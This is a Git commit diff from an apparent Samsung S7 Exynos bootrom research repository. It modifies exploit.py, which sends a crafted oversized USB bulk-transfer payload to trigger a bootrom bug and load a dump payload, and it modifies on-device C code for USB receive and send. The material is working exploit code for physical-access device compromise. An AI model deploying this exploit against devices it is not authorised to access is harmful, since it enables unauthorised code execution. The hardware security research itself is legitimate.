EljakimHerrewijnen/Samsung_S7
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

working usb send

Browse Source
This commit is contained in:
Eljakim Herrewijnen 2024-07-23 23:50:40 +02:00
parent a9def4a27d
commit 8c1f008deb
5 changed files with 54 additions and 17 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

BIN
dwc3.bin
View File

Binary file not shown.

BIN
dwc3.elf
View File

Binary file not shown.

BIN
dwc3.o
View File

Binary file not shown.

7
exploit.py
View File

@ -82,7 +82,7 @@ class ExynosDevice():
# self.write(b"\xaa" * CHUNK_SIZE, CHUNK_SIZE) # self.write(b"\xaa" * CHUNK_SIZE, CHUNK_SIZE)
transferred = ctypes.c_int() transferred = ctypes.c_int()
bug_payload = p32(0) + p32(MAX_PAYLOAD_SIZE + 0x100) + b"\x00" * MAX_PAYLOAD_SIZE + p16(0) bug_payload = p32(0) + p32(0x201 + 2 + MAX_PAYLOAD_SIZE + 0x7) + b"\x00" * MAX_PAYLOAD_SIZE + p16(0)
bug_payload += b"\xcc" * (BLOCK_SIZE - len(bug_payload)) bug_payload += b"\xcc" * (BLOCK_SIZE - len(bug_payload))
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, bug_payload, len(bug_payload), ctypes.byref(transferred), 0) res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, bug_payload, len(bug_payload), ctypes.byref(transferred), 0)
assert res == 0 assert res == 0
@ -91,8 +91,10 @@ class ExynosDevice():
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, payload, len(payload), ctypes.byref(transferred), 0) res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, payload, len(payload), ctypes.byref(transferred), 0)
assert res == 0 assert res == 0
payload = b"\xaa" * (0x401 - (MAX_PAYLOAD_SIZE - 0x200)) payload = b"\xaa" * 0x200
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, payload, len(payload), ctypes.byref(transferred), 0) res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, payload, len(payload), ctypes.byref(transferred), 0)
while True:
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, payload, len(payload), ctypes.byref(transferred), 10)
pass pass
def test_bug(self): def test_bug(self):
@ -278,6 +280,7 @@ if __name__ == "__main__":
# wait_for_device() # wait_for_device()
exynos = ExynosDevice() exynos = ExynosDevice()
exynos.test_bug_2() exynos.test_bug_2()
sys.exit(0)
path = "dump/exynos-usbdl/payloads/Exynos8890_dump_bootrom.bin" path = "dump/exynos-usbdl/payloads/Exynos8890_dump_bootrom.bin"
# path = "/home/eljakim/Source/gupje/source/bin/samsung_s7/debugger.bin" # path = "/home/eljakim/Source/gupje/source/bin/samsung_s7/debugger.bin"
exynos.exploit(open(path, "rb").read()) exynos.exploit(open(path, "rb").read())

62
test_dwc3.c
View File

@ -10,25 +10,16 @@ extern void sleep(int endpoint,uint32_t timeout);
#define recv_buffer 0x02021800 + 0x2000 #define recv_buffer 0x02021800 + 0x2000
#define data_received 0x02021800 + 0x2004 #define data_received 0x02021800 + 0x2004
// do {
// /* loops until image has been received */
// usb_event_handler();
// iVar2 = download_ready?(); #TODO, set some global to indicate readyness
// } while (iVar2 == 0);
void recv_data_cb(uint32_t endpoint, uint32_t len){ void recv_data_cb(uint32_t endpoint, uint32_t len){
void *rbuf; void *rbuf;
void *dest_buf = (void *)recv_buffer; void *dest_buf = (void *)recv_buffer;
volatile void *dref = (void *)data_received; volatile void *dref = (void *)data_received;
rbuf = get_endpoint_buffer(endpoint);
for(int i= 0; i < len; i++){ for(int i= 0; i < len; i++){
rbuf = get_endpoint_buffer(2);
*(char *)dest_buf = *(char *)(void *)((int)rbuf + i); *(char *)dest_buf = *(char *)(void *)((int)rbuf + i);
} }
// while(1){} *(uint8_t *)dref = 1; // Mark as ready
// asm("mov x0, #0x0");
// asm("br x0");
*(uint8_t *)dref = 3;
} }
void recv_data(){ void recv_data(){
@ -38,18 +29,61 @@ void recv_data(){
volatile void *dref = (void *)data_received; volatile void *dref = (void *)data_received;
*(uint8_t *)dref = 0; *(uint8_t *)dref = 0;
maybe_usb_setup_read(2, recv_data_cb, 1); maybe_usb_setup_read(2, recv_data_cb, 0x200);
void *rbuf = get_endpoint_buffer(2);
dwc3_ep0_start_trans(2, (uint32_t)rbuf, 0x200);
while(1){ while(1){
usb_event_handler(); usb_event_handler();
if(*(uint8_t *)dref == 3){ if(*(uint8_t *)dref == 1){
break; break;
} }
sleep(1, 10);
} }
} }
void send_data(uint32_t *address, uint32_t size)
{
// asm("stp x29, x30, [sp,#-48]!");;
// asm("mov w3, #0x0");
// asm("bfxil w3, w1, #0, #24");
// asm("mov w1, #0xc12");
// asm("mov x29, sp");
// asm("stp x19, x20, [sp,#16]");
// asm("mov x5, #0xc834");
// asm("mov w20, #0x1");
// asm("movk x5, #0x1540, lsl #16");
// asm("ldr x2, [x29,#40]");
// asm("mov x4, #0xc838");
// asm("orr w6, w1, w20");
// asm("movk x4, #0x1540, lsl #16");
// asm("mov x19, #0xc83c");
// asm("movk x19, #0x1540, lsl #16");
// asm("stp w3, w1, [x2,#8]");
// asm("mov w3, #0x406");
// asm("stp w0, wzr, [x2]");
// asm("mov w0, w20");
// asm("ldr x1, [x29,#40]");
// asm("strb w6, [x2,#12]");
// asm("mov x2, #0x27c8");
// asm("str w1, [x5]");
// asm("mov w1, #0x1388");
// asm("str wzr, [x4]");
// asm("str w3, [x19]");
// asm("blr x2");
// asm("mov w0, w20");
// asm("ldr w1, [x19]");
// asm("ldp x19, x20, [sp,#16]");
// asm("ldp x29, x30, [sp],#48");
// asm("ret");
}
int main() { int main() {
while(1){
recv_data(); recv_data();
send_data((uint32_t *) recv_buffer, 0x200);
}
// recv_data(); // recv_data();
// sleep(1, 5000); // sleep(1, 5000);
asm("mov x0, #0x0"); asm("mov x0, #0x0");